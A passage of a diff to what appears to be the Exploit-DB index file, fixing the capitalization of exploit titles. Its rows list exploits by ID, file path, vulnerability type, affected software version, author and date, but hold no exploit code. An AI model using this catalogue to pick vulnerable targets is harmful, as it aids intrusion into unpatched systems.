/modules/public/date_format.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 27225,platforms/php/webapps/27225.txt,"dotProject 2.0 - /modules/tasks/gantt.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 27226,platforms/php/webapps/27226.txt,"RunCMS 1.2/1.3 - PMLite.php SQL Injection",2006-02-14,"Hamid Ebadi",php,webapps,0 -27227,platforms/php/webapps/27227.txt,"Wordpress 2.0 - Comment Post HTML Injection",2006-02-15,imei,php,webapps,0 +27227,platforms/php/webapps/27227.txt,"WordPress 2.0 - Comment Post HTML Injection",2006-02-15,imei,php,webapps,0 27228,platforms/php/webapps/27228.txt,"Mantis 0.x/1.0 - view_all_set.php Multiple Parameter Cross-Site Scripting",2006-02-15,"Thomas Waldegger",php,webapps,0 27229,platforms/php/webapps/27229.txt,"Mantis 0.x/1.0 - manage_user_page.php sort Parameter Cross-Site Scripting",2006-02-15,"Thomas Waldegger",php,webapps,0 27230,platforms/php/webapps/27230.txt,"My Blog 1.63 - BBCode HTML Injection",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24358,14 +24359,14 @@ id,file,description,date,author,platform,type,port 27235,platforms/linux/remote/27235.txt,"SAP Business Connector 4.6/4.7 - adapter-index.dsp url Variable Arbitrary Site Redirect",2006-02-15,"Leandro Meiners",linux,remote,0 27236,platforms/php/webapps/27236.txt,"MyBB 1.0.3 - private.php Multiple SQL Injection",2006-02-15,imei,php,webapps,0 27237,platforms/php/webapps/27237.txt,"HTML::BBCode 1.03/1.04 - HTML Injection",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 -27238,platforms/php/webapps/27238.php,"DreamCost HostAdmin 3.0 - 'index.php' Remote File Inclusion",2006-02-16,ReZEN,php,webapps,0 +27238,platforms/php/webapps/27238.php,"Dreamcost HostAdmin 3.0 - 'index.php' Remote File Inclusion",2006-02-16,ReZEN,php,webapps,0 27239,platforms/php/webapps/27239.txt,"BirthSys 3.1 - Multiple SQL Injections",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 27240,platforms/php/webapps/27240.txt,"MyBB 1.0.2/1.0.3 - Managegroup.php SQL Injection",2006-02-16,imei,php,webapps,0 27241,platforms/hardware/dos/27241.c,"D-Link DWL-G700AP 2.00/2.01 - HTTPD Denial of Service",2006-02-16,l0om,hardware,dos,0 27242,platforms/php/webapps/27242.txt,"MyBB 1.0.3 - Managegroup.php Cross-Site Scripting",2006-02-16,imei,php,webapps,0 27243,platforms/php/webapps/27243.txt,"Siteframe Beaumont 5.0.1/5.0.2 - 'page.php' HTML Injection",2006-02-16,federico.alice@tiscali.it,php,webapps,0 27244,platforms/linux/remote/27244.txt,"Wimpy MP3 Player 5 - Text File Overwrite",2006-02-16,ReZEN,linux,remote,0 -27245,platforms/php/webapps/27245.txt,"V-webmail 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-02-17,$um$id,php,webapps,0 +27245,platforms/php/webapps/27245.txt,"V-Webmail 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-02-17,$um$id,php,webapps,0 27246,platforms/linux/dos/27246.txt,"Mozilla Thunderbird 1.5 - Address Book Import Remote Denial of Service",2006-02-17,DrFrancky,linux,dos,0 27247,platforms/php/webapps/27247.txt,"E107 Website System 0.7.2 Chatbox Plugin - HTML Injection",2006-02-18,"marc & shb",php,webapps,0 27248,platforms/php/webapps/27248.txt,"Webpagecity WPC easy - SQL Injection",2006-02-18,murfie,php,webapps,0 @@ -24390,19 +24391,19 @@ id,file,description,date,author,platform,type,port 27267,platforms/php/webapps/27267.txt,"Dragonfly CMS 9.0.6.1 - Surveys Module Multiple Parameter Cross-Site Scripting",2006-02-22,Lostmon,php,webapps,0 27268,platforms/php/webapps/27268.txt,"Dragonfly CMS 9.0.6.1 - Downloads Module c Parameter Cross-Site Scripting",2006-02-22,Lostmon,php,webapps,0 27269,platforms/php/webapps/27269.txt,"Dragonfly CMS 9.0.6.1 - Coppermine Module album Parameter Cross-Site Scripting",2006-02-22,Lostmon,php,webapps,0 -27494,platforms/php/webapps/27494.txt,"PHPmyfamily 1.4.1 - Track.php Cross-Site Scripting",2006-03-28,matrix_killer,php,webapps,0 +27494,platforms/php/webapps/27494.txt,"phpMyFamily 1.4.1 - Track.php Cross-Site Scripting",2006-03-28,matrix_killer,php,webapps,0 27495,platforms/php/webapps/27495.txt,"PHPCOIN 1.2 - mod_print.php fs Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 27496,platforms/php/webapps/27496.txt,"PHPCOIN 1.2 - mod.php fs Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 27271,platforms/windows/remote/27271.rb,"HP Data Protector - CMD Install Service (Metasploit)",2013-08-02,"Ben Turner",windows,remote,0 27272,platforms/php/webapps/27272.txt,"SocialEngine Timeline Plugin 4.2.5p9 - Arbitrary File Upload",2013-08-02,spyk2r,php,webapps,0 27273,platforms/windows/dos/27273.txt,"TEC-IT TBarCode - OCX ActiveX Control (TBarCode4.ocx 4.1.0) Crash (PoC)",2013-08-02,d3b4g,windows,dos,0 -27274,platforms/php/webapps/27274.txt,"Ginkgo CMS - 'index.php rang parameter' SQL Injection",2013-08-02,Raw-x,php,webapps,0 +27274,platforms/php/webapps/27274.txt,"Ginkgo CMS - 'index.php rang Parameter' SQL Injection",2013-08-02,Raw-x,php,webapps,0 27275,platforms/php/webapps/27275.txt,"FunGamez - Remote File Upload",2013-08-02,"cr4wl3r ",php,webapps,0 27276,platforms/php/webapps/27276.html,"Bigace CMS 2.7.8 - Add Admin Account Cross-Site Request Forgery",2013-08-02,"Yashar shahinzadeh",php,webapps,0 27277,platforms/windows/remote/27277.py,"PCMAN FTP 2.07 - PASS Command Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0 27528,platforms/hardware/remote/27528.rb,"D-Link Devices - Unauthenticated Remote Command Execution (2)",2013-08-12,Metasploit,hardware,remote,0 27279,platforms/php/webapps/27279.txt,"vtiger CRM 5.4.0 (SOAP Services) - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps,0 -27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b - (pages.php page_name parameter) SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0 +27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b - (pages.php page_name Parameter) SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0 27282,platforms/windows/local/27282.txt,"Agnitum Outpost Security Suite 8.1 - Privilege Escalation",2013-08-02,"Ahmad Moghimi",windows,local,0 27283,platforms/hardware/webapps/27283.txt,"D-Link DIR-645 1.03B08 - Multiple Vulnerabilities",2013-08-02,"Roberto Paleari",hardware,webapps,0 27284,platforms/hardware/webapps/27284.txt,"INSTEON Hub 2242-222 - Lack of Web and API Authentication",2013-08-02,"Trustwave's SpiderLabs",hardware,webapps,0 @@ -24411,13 +24412,13 @@ id,file,description,date,author,platform,type,port 27287,platforms/php/webapps/27287.txt,"Cotonti 0.9.13 - SQL Injection",2013-08-02,"High-Tech Bridge SA",php,webapps,0 27288,platforms/hardware/webapps/27288.txt,"Western Digital My Net Wireless Routers - Password Disclosure",2013-08-02,"Kyle Lovett",hardware,webapps,0 27289,platforms/hardware/webapps/27289.txt,"TP-Link TL-SC3171 IP Cameras - Multiple Vulnerabilities",2013-08-02,"Core Security",hardware,webapps,0 -27290,platforms/php/webapps/27290.txt,"Wordpress Plugin Better WP Security - Persistent Cross-Site Scripting",2013-08-02,"Richard Warren",php,webapps,0 +27290,platforms/php/webapps/27290.txt,"WordPress Plugin Better WP Security - Persistent Cross-Site Scripting",2013-08-02,"Richard Warren",php,webapps,0 27291,platforms/windows/webapps/27291.txt,"Oracle Hyperion 11 - Directory Traversal",2013-08-02,"Richard Warren",windows,webapps,19000 27292,platforms/windows/dos/27292.py,"EchoVNC Viewer - Remote Denial of Service",2013-08-02,Z3r0n3,windows,dos,0 27293,platforms/php/remote/27293.rb,"PineApp Mail-SeCure - test_li_connection.php Arbitrary Command Execution",2013-08-02,Metasploit,php,remote,7443 27294,platforms/php/remote/27294.rb,"PineApp Mail-SeCure - ldapsyncnow.php Arbitrary Command Execution",2013-08-02,Metasploit,php,remote,7443 27295,platforms/unix/remote/27295.rb,"PineApp Mail-SeCure - livelog.html Arbitrary Command Execution",2013-08-02,Metasploit,unix,remote,7443 -27296,platforms/windows/local/27296.rb,"Windows - HWND_BROADCAST Low to Medium Integrity Privilege Escalation (MS13-005)",2013-08-02,Metasploit,windows,local,0 +27296,platforms/windows/local/27296.rb,"Microsoft Windows - HWND_BROADCAST Low to Medium Integrity Privilege Escalation (MS13-005)",2013-08-02,Metasploit,windows,local,0 27297,platforms/linux/local/27297.c,"Linux Kernel 3.7.6 (Redhat x86/x64) - 'MSR' Driver Privilege Escalation",2013-08-02,spender,linux,local,0 27298,platforms/php/webapps/27298.txt,"Web Calendar Pro - Dropbase.php SQL Injection",2006-02-23,ReZEN,php,webapps,0 27299,platforms/php/webapps/27299.txt,"NOCC 1.0 - error.php html_error_occurred Parameter Cross-Site Scripting",2006-02-23,rgod,php,webapps,0 @@ -24465,16 +24466,16 @@ id,file,description,date,author,platform,type,port 27341,platforms/php/webapps/27341.txt,"DCI-Designs Dawaween 1.03 - Poems.php SQL Injection",2006-03-02,sherba,php,webapps,0 27342,platforms/php/webapps/27342.txt,"PluggedOut Nexus 0.1 - forgotten_password.php SQL Injection",2006-03-02,"Hamid Ebadi",php,webapps,0 27343,platforms/php/webapps/27343.txt,"vBulletin 3.0/3.5 - profile.php Email Field HTML Injection",2006-03-02,imei,php,webapps,0 -27344,platforms/php/webapps/27344.txt,"NZ Ecommerce System - 'index.php' Multiple Parameter SQL Injection",2006-03-02,r0t,php,webapps,0 +27344,platforms/php/webapps/27344.txt,"NZ eCommerce System - 'index.php' Multiple Parameter SQL Injection",2006-03-02,r0t,php,webapps,0 27345,platforms/php/webapps/27345.txt,"LogIT 1.3/1.4 - Remote File Inclusion",2006-03-02,botan,php,webapps,0 27346,platforms/php/webapps/27346.txt,"VBZoom Forum 1.11 - show.php MainID SQL Injection",2006-03-04,Mr.SNAKE,php,webapps,0 27347,platforms/php/webapps/27347.txt,"VBZooM Forum 1.11 - comment.php UserID Parameter Cross-Site Scripting",2006-03-04,Mr.SNAKE,php,webapps,0 27348,platforms/php/webapps/27348.txt,"VBZooM Forum 1.11 - contact.php UserID Parameter Cross-Site Scripting",2006-03-04,Mr.SNAKE,php,webapps,0 -27349,platforms/php/webapps/27349.txt,"PHPArcadeScript 2.0 - tellafriend.php gamename Parameter Cross-Site Scripting",2006-03-04,Retard,php,webapps,0 -27350,platforms/php/webapps/27350.txt,"PHPArcadeScript 2.0 - loginbox.php login_status Parameter Cross-Site Scripting",2006-03-04,Retard,php,webapps,0 -27351,platforms/php/webapps/27351.txt,"PHPArcadeScript 2.0 - 'index.php' submissionstatus Parameter Cross-Site Scripting",2006-03-04,Retard,php,webapps,0 -27352,platforms/php/webapps/27352.txt,"PHPArcadeScript 2.0 - browse.php Multiple Parameter Cross-Site Scripting",2006-03-04,Retard,php,webapps,0 -27353,platforms/php/webapps/27353.txt,"PHPArcadeScript 2.0 - displaygame.php gamefile Parameter Cross-Site Scripting",2006-03-04,Retard,php,webapps,0 +27349,platforms/php/webapps/27349.txt,"phpArcadeScript 2.0 - tellafriend.php gamename Parameter Cross-Site Scripting",2006-03-04,Retard,php,webapps,0 +27350,platforms/php/webapps/27350.txt,"phpArcadeScript 2.0 - loginbox.php login_status Parameter Cross-Site Scripting",2006-03-04,Retard,php,webapps,0 +27351,platforms/php/webapps/27351.txt,"phpArcadeScript 2.0 - 'index.php' submissionstatus Parameter Cross-Site Scripting",2006-03-04,Retard,php,webapps,0 +27352,platforms/php/webapps/27352.txt,"phpArcadeScript 2.0 - browse.php Multiple Parameter Cross-Site Scripting",2006-03-04,Retard,php,webapps,0 +27353,platforms/php/webapps/27353.txt,"phpArcadeScript 2.0 - displaygame.php gamefile Parameter Cross-Site Scripting",2006-03-04,Retard,php,webapps,0 27354,platforms/php/webapps/27354.txt,"Easy Forum 2.5 - New User Image File HTML Injection",2006-03-04,"Aliaksandr Hartsuyeu",php,webapps,0 27355,platforms/php/webapps/27355.txt,"Woltlab Burning Board 2.3.4 - misc.php Cross-Site Scripting",2006-03-04,r57shell,php,webapps,0 27362,platforms/php/webapps/27362.txt,"Bitweaver 1.1/1.2 - Title Field HTML Injection",2006-03-06,Kiki,php,webapps,0 @@ -24488,23 +24489,23 @@ id,file,description,date,author,platform,type,port 27370,platforms/php/webapps/27370.txt,"LoudBlog 0.41 - backend_settings.php language Parameter Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0 27371,platforms/php/webapps/27371.txt,"HitHost 1.0 - deleteuser.php user Parameter Cross-Site Scripting",2006-03-06,Retard,php,webapps,0 27372,platforms/php/webapps/27372.txt,"HitHost 1.0 - viewuser.php hits Parameter Cross-Site Scripting",2006-03-06,Retard,php,webapps,0 -27373,platforms/php/webapps/27373.txt,"TextfileBB 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-08,Retard,php,webapps,0 +27373,platforms/php/webapps/27373.txt,"TextFileBB 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-08,Retard,php,webapps,0 27374,platforms/php/webapps/27374.txt,"sBlog 0.7.2 - search.php keyword Variable POST Method Cross-Site Scripting",2006-03-09,Kiki,php,webapps,0 27375,platforms/php/webapps/27375.txt,"sBlog 0.7.2 - comments_do.php Multiple Variable POST Method Cross-Site Scripting",2006-03-09,Kiki,php,webapps,0 27376,platforms/ios/webapps/27376.txt,"FTP OnConnect 1.4.11 iOS - Multiple Vulnerabilities",2013-08-07,Vulnerability-Lab,ios,webapps,0 27377,platforms/windows/dos/27377.txt,"Easy File Sharing Web Server 3.2 - Format String Denial of Service",2006-03-09,"Revnic Vasile",windows,dos,0 27378,platforms/windows/remote/27378.txt,"Easy File Sharing Web Server 3.2 - Full Path Request Arbitrary File Upload",2006-03-09,"Revnic Vasile",windows,remote,0 27379,platforms/php/webapps/27379.txt,"ADP Forum 2.0.x - Subject Field HTML Injection",2006-03-09,liz0,php,webapps,0 -27380,platforms/php/webapps/27380.txt,"myBloggie 2.1.2/2.1.3 - upload.php Multiple Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 -27381,platforms/php/webapps/27381.txt,"myBloggie 2.1.2/2.1.3 - delcomment.php Multiple Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 -27382,platforms/php/webapps/27382.txt,"myBloggie 2.1.2/2.1.3 - deluser.php 'id' Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 -27383,platforms/php/webapps/27383.txt,"myBloggie 2.1.2/2.1.3 - addcat.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 -27384,platforms/php/webapps/27384.txt,"myBloggie 2.1.2/2.1.3 - edituser.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 -27385,platforms/php/webapps/27385.txt,"myBloggie 2.1.2/2.1.3 - adduser.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 -27386,platforms/php/webapps/27386.txt,"myBloggie 2.1.2/2.1.3 - editcat.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 -27387,platforms/php/webapps/27387.txt,"myBloggie 2.1.2/2.1.3 - add.php trackback_url Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 -27388,platforms/php/webapps/27388.txt,"myBloggie 2.1.2/2.1.3 - delcat.php cat_id Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 -27389,platforms/php/webapps/27389.txt,"myBloggie 2.1.2/2.1.3 - del.php post_id Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 +27380,platforms/php/webapps/27380.txt,"MyBloggie 2.1.2/2.1.3 - upload.php Multiple Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 +27381,platforms/php/webapps/27381.txt,"MyBloggie 2.1.2/2.1.3 - delcomment.php Multiple Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 +27382,platforms/php/webapps/27382.txt,"MyBloggie 2.1.2/2.1.3 - deluser.php 'id' Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 +27383,platforms/php/webapps/27383.txt,"MyBloggie 2.1.2/2.1.3 - addcat.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 +27384,platforms/php/webapps/27384.txt,"MyBloggie 2.1.2/2.1.3 - edituser.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 +27385,platforms/php/webapps/27385.txt,"MyBloggie 2.1.2/2.1.3 - adduser.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 +27386,platforms/php/webapps/27386.txt,"MyBloggie 2.1.2/2.1.3 - editcat.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 +27387,platforms/php/webapps/27387.txt,"MyBloggie 2.1.2/2.1.3 - add.php trackback_url Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 +27388,platforms/php/webapps/27388.txt,"MyBloggie 2.1.2/2.1.3 - delcat.php cat_id Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 +27389,platforms/php/webapps/27389.txt,"MyBloggie 2.1.2/2.1.3 - del.php post_id Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 27390,platforms/php/webapps/27390.txt,"DCP-Portal 3.7/4.x/5.x/6.x - 'index.php' Multiple Parameter Cross-Site Scripting",2006-03-09,"Nenad Jovanovic",php,webapps,0 27391,platforms/php/webapps/27391.txt,"DCP-Portal 3.7/4.x/5.x/6.x - calendar.php Multiple Parameter Cross-Site Scripting",2006-03-09,"Nenad Jovanovic",php,webapps,0 27392,platforms/php/webapps/27392.txt,"DCP-Portal 3.7/4.x/5.x/6.x - forums.php Multiple Parameter Cross-Site Scripting",2006-03-09,"Nenad Jovanovic",php,webapps,0 @@ -24514,13 +24515,13 @@ id,file,description,date,author,platform,type,port 27396,platforms/php/webapps/27396.txt,"txtForum 1.0.3/1.0.4 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-09,"Nenad Jovanovic",php,webapps,0 27397,platforms/linux/remote/27397.txt,"Apache suEXEC - Privilege Elevation / Information Disclosure",2013-08-07,kingcope,linux,remote,0 27398,platforms/php/webapps/27398.txt,"Pluck CMS 4.7 - HTML Code Injection",2013-08-07,"Yashar shahinzadeh",php,webapps,0 -27399,platforms/php/webapps/27399.txt,"Wordpress Booking Calendar 4.1.4 Plugin - Cross-Site Request Forgery",2013-08-07,"Dylan Irzi",php,webapps,0 +27399,platforms/php/webapps/27399.txt,"WordPress Booking Calendar 4.1.4 Plugin - Cross-Site Request Forgery",2013-08-07,"Dylan Irzi",php,webapps,0 27400,platforms/windows/remote/27400.py,"HP Data Protector - Arbitrary Remote Command Execution",2013-08-07,"Alessandro Di Pinto and Claudio Moletta",windows,remote,0 27401,platforms/windows/remote/27401.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Authentication Bypass / Directory Traversal SAM Retrieval Exploit",2013-08-07,Wireghoul,windows,remote,0 27402,platforms/hardware/webapps/27402.txt,"Hikvision IP Cameras 4.1.0 b130111 - Multiple Vulnerabilities",2013-08-07,"Core Security",hardware,webapps,0 -27403,platforms/php/webapps/27403.txt,"Wordpress Usernoise Plugin 3.7.8 - Persistent Cross-Site Scripting",2013-08-07,RogueCoder,php,webapps,0 +27403,platforms/php/webapps/27403.txt,"WordPress Usernoise Plugin 3.7.8 - Persistent Cross-Site Scripting",2013-08-07,RogueCoder,php,webapps,0 27405,platforms/php/webapps/27405.txt,"Joomla Sectionex Component 2.5.96 - SQL Injection",2013-08-07,"Matias Fontanini",php,webapps,0 -27406,platforms/windows/webapps/27406.txt,"McAfee Superscan 4.0 - Cross-Site Scripting",2013-08-07,"Trustwave's SpiderLabs",windows,webapps,0 +27406,platforms/windows/webapps/27406.txt,"McAfee SuperScan 4.0 - Cross-Site Scripting",2013-08-07,"Trustwave's SpiderLabs",windows,webapps,0 27407,platforms/windows/dos/27407.pl,"UnrealIRCd 3.x - Remote Denial of Service",2006-03-09,"Brandon Milner",windows,dos,0 27408,platforms/php/webapps/27408.txt,"txtForum 1.0.3/1.0.4 - Remote PHP Script Code Injection",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 27409,platforms/php/webapps/27409.txt,"QwikiWiki 1.4/1.5 - 'index.php' Multiple Parameter Cross-Site Scripting",2006-03-10,Kiki,php,webapps,0 @@ -24543,22 +24544,22 @@ id,file,description,date,author,platform,type,port 27427,platforms/php/webapps/27427.txt,"Contrexx CMS 1.0.x - 'index.php' Cross-Site Scripting",2006-03-16,Soot,php,webapps,0 27428,platforms/hardware/remote/27428.rb,"D-Link Devices - Unauthenticated Remote Command Execution (1)",2013-08-08,Metasploit,hardware,remote,0 27429,platforms/windows/remote/27429.rb,"Firefox - onreadystatechange Event DocumentViewerImpl Use-After-Free",2013-08-08,Metasploit,windows,remote,0 -27430,platforms/php/webapps/27430.txt,"PHPFox 3.6.0 - (build3) Multiple SQL Injection",2013-08-08,"Matias Fontanini",php,webapps,0 +27430,platforms/php/webapps/27430.txt,"PHPFox 3.6.0 (build3) - Multiple SQL Injection",2013-08-08,"Matias Fontanini",php,webapps,0 27431,platforms/php/webapps/27431.txt,"BigTree CMS 4.0 RC2 - Multiple Vulnerabilities",2013-08-08,"High-Tech Bridge SA",php,webapps,0 27991,platforms/php/webapps/27991.txt,"PostNuke 0.76 RC2 - Multiple Input Validation Vulnerabilities",2006-06-07,SpC-x,php,webapps,0 27990,platforms/php/webapps/27990.txt,"Calendar Express 2.2 - month.php SQL Injection",2006-06-07,"CrAzY CrAcKeR",php,webapps,0 -27443,platforms/php/webapps/27443.txt,"ExtCalendar 1.0 - Cross-Site Scripting",2006-03-18,Soothackers,php,webapps,0 +27443,platforms/php/webapps/27443.txt,"Extcalendar 1.0 - Cross-Site Scripting",2006-03-18,Soothackers,php,webapps,0 27444,platforms/php/webapps/27444.txt,"Woltlab Burning Board 2.3.4 - Class_DB_MySQL.php Cross-Site Scripting",2006-03-18,r57shell,php,webapps,0 27445,platforms/php/webapps/27445.txt,"MusicBox 2.3 - 'index.php' Multiple Parameter SQL Injection",2006-03-18,Linux_Drox,php,webapps,0 27446,platforms/php/webapps/27446.txt,"MusicBox 2.3 - 'index.php' Multiple Parameter Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps,0 27447,platforms/php/webapps/27447.txt,"MusicBox 2.3 - cart.php Multiple Parameter Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps,0 27448,platforms/php/webapps/27448.txt,"phpWebSite 0.8.2/0.8.3 - friend.php sid Parameter SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps,0 27449,platforms/php/webapps/27449.txt,"phpWebSite 0.8.2/0.8.3 - article.php sid Parameter SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps,0 -27450,platforms/php/webapps/27450.txt,"WinHKI 1.4/1.5/1.6 - Remote Directory Traversal",2006-02-24,raphael.huck@free.fr,php,webapps,0 +27450,platforms/php/webapps/27450.txt,"WinHKI 1.4/1.5/1.6 - Directory Traversal",2006-02-24,raphael.huck@free.fr,php,webapps,0 27451,platforms/cgi/webapps/27451.txt,"Verisign MPKI 6.0 - Haydn.exe Cross-Site Scripting",2006-03-20,"Alberto Soli",cgi,webapps,0 27452,platforms/hardware/remote/27452.txt,"F5 Firepass 4100 SSL VPN - Cross-Site Scripting",2006-03-21,"ILION Research",hardware,remote,0 27453,platforms/php/webapps/27453.txt,"PHP Live! 3.0 - Status_Image.php Cross-Site Scripting",2006-03-22,kspecial,php,webapps,0 -27454,platforms/php/webapps/27454.txt,"Motorola - Bluetooth Interface Dialog Spoofing",2006-03-22,kspecial,php,webapps,0 +27454,platforms/php/webapps/27454.txt,"Motorola - BlueTooth Interface Dialog Spoofing",2006-03-22,kspecial,php,webapps,0 27455,platforms/cfm/webapps/27455.txt,"1WebCalendar 4.0 - viewEvent.cfm EventID Parameter SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 27456,platforms/cfm/webapps/27456.txt,"1WebCalendar 4.0 - /news/newsView.cfm NewsID Parameter SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 27457,platforms/cfm/webapps/27457.txt,"1WebCalendar 4.0 - mainCal.cfm SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 @@ -24572,13 +24573,13 @@ id,file,description,date,author,platform,type,port 27465,platforms/php/webapps/27465.txt,"VihorDesign - 'index.php' Cross-Site Scripting",2006-03-24,botan,php,webapps,0 27466,platforms/php/webapps/27466.txt,"VihorDesign - 'index.php' Remote File Inclusion",2006-03-24,botan,php,webapps,0 27467,platforms/php/webapps/27467.txt,"ConfTool 1.1 - 'index.php' Cross-Site Scripting",2006-03-27,botan,php,webapps,0 -27468,platforms/php/webapps/27468.txt,"Nuked-Klan 1.x - 'index.php' SQL Injection",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 +27468,platforms/php/webapps/27468.txt,"Nuked-klaN 1.x - 'index.php' SQL Injection",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 27469,platforms/asp/webapps/27469.txt,"EZHomePagePro 1.5 - email.asp Multiple Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 27470,platforms/asp/webapps/27470.txt,"EZHomePagePro 1.5 - users_search.asp Multiple Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 27471,platforms/asp/webapps/27471.txt,"EZHomePagePro 1.5 - users_calendar.asp page Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 27472,platforms/asp/webapps/27472.txt,"EZHomePagePro 1.5 - users_profiles.asp Multiple Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 27473,platforms/asp/webapps/27473.txt,"EZHomePagePro 1.5 - users_mgallery.asp usid Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 -27474,platforms/multiple/dos/27474.txt,"LibVC - .VCard 003 Processing Buffer Overflow",2006-03-21,trew,multiple,dos,0 +27474,platforms/multiple/dos/27474.txt,"LibVC - '.VCard' 003 Processing Buffer Overflow",2006-03-21,trew,multiple,dos,0 27475,platforms/php/webapps/27475.txt,"SaPHPLesson 2.0 - print.php SQL Injection",2006-03-27,Linux_Drox,php,webapps,0 27476,platforms/windows/dos/27476.txt,"Microsoft .NET Framework SDK 1.0/1.1 - MSIL Tools Buffer Overflow Vulnerabilities",2006-03-27,"Dinis Cruz",windows,dos,0 27477,platforms/php/webapps/27477.txt,"Maian Weblog 2.0 - print.php Multiple Parameter SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24617,20 +24618,20 @@ id,file,description,date,author,platform,type,port 27513,platforms/php/webapps/27513.txt,"VNews 1.2 - Multiple SQL Injections",2006-03-30,"Aliaksandr Hartsuyeu",php,webapps,0 27514,platforms/php/webapps/27514.txt,"Tribq CMS 5.2.7 - Adding/Editing New Administrator Account Cross-Site Request Forgery",2013-08-12,"Yashar shahinzadeh",php,webapps,0 27515,platforms/php/webapps/27515.txt,"Open Real Estate CMS 1.5.1 - Multiple Vulnerabilities",2013-08-12,"Yashar shahinzadeh",php,webapps,0 -27518,platforms/php/webapps/27518.txt,"MLMAuction Script - 'gallery.php id parameter' SQL Injection",2013-08-12,3spi0n,php,webapps,0 +27518,platforms/php/webapps/27518.txt,"MLMAuction Script - 'gallery.php id Parameter' SQL Injection",2013-08-12,3spi0n,php,webapps,0 27519,platforms/php/webapps/27519.txt,"phpVID 1.2.3 - Multiple Vulnerabilities",2013-08-12,3spi0n,php,webapps,0 27729,platforms/php/webapps/27729.txt,"Scry Gallery 1.1 - 'index.php' Cross-Site Scripting",2006-04-24,mayank,php,webapps,0 27521,platforms/php/webapps/27521.txt,"Ajax PHP Penny Auction 1.x 2.x - Multiple Vulnerabilities",2013-08-12,"Taha Hunter",php,webapps,80 27522,platforms/php/webapps/27522.txt,"Gnew 2013.1 - Multiple Vulnerabilities (1)",2013-08-12,LiquidWorm,php,webapps,80 27533,platforms/php/webapps/27533.txt,"X-Changer 0.20 - Multiple SQL Injections",2006-03-30,"Morocco Security Team",php,webapps,0 27523,platforms/windows/remote/27523.py,"Sami FTP Server 2.0.1 - MKD Buffer Overflow ASLR Bypass (SEH)",2013-08-12,Polunchis,windows,remote,21 -27728,platforms/cgi/webapps/27728.txt,"Blender 2.36 - .BVF File Import Python Code Execution",2006-04-24,"Joxean Koret",cgi,webapps,0 +27728,platforms/cgi/webapps/27728.txt,"Blender 2.36 - '.BVF' File Import Python Code Execution",2006-04-24,"Joxean Koret",cgi,webapps,0 27525,platforms/php/webapps/27525.txt,"Integrated CMS 1.0 - SQL Injection",2013-08-12,DSST,php,webapps,80 27526,platforms/windows/remote/27526.txt,"Oracle Java - storeImageArray() Invalid Array Indexing",2013-08-12,"Packet Storm",windows,remote,0 27527,platforms/multiple/remote/27527.rb,"Ruby on Rails - Known Secret Session 